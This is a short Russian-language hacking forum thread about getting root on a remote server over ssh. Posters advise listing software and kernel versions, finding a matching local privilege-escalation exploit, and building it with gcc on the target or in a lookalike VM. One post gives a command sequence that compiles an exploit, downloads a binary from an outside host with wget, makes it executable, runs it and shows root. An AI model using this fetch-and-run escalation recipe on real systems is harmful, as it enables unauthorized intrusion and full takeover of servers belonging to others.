PDA

Просмотр полной версии : Как рутануть ssh


Dr.Lafa
20.04.2018, 01:49
Реально, если на удалённой машине есть уязвимости/лазейки для повышения привелегий

pr0phet
20.04.2018, 03:38
3amunyk сказал(а):

По ядру искать уязвимости в метасплоите ?


Не в метасплойте. Узнай какой софт установлен - его версии - в том числе и ядро. Посмотри, есть ли gcc на серваке. Если есть - ищи подходящий сплойт - собирай - получай рута. Если нет gcc - поднимай на виртуалке подобную систему с подобным ядром - собирай у себя - заливай бинарник - получай рута. Ну это как пример. Если сплойт на перле - есесно тебе нужен интерпретатор на сервере. В общем логика такая.

pr0phet
20.04.2018, 04:22
3amunyk сказал(а):

Вот тут не понял ) как бинарник соберу ?


gcc super_sploit.c -o super_sploit
wget http://xackep.site/super_sploit
chmod +x super_sploit
./super_sploit
whoami
root

z3RoTooL
20.04.2018, 17:08
p.r0phe.t сказал(а):

gcc super_sploit.c -o super_sploit
wget http://xackep.site/super_sploit
chmod +x super_sploit
./super_sploit
whoami
root


как в кино прям )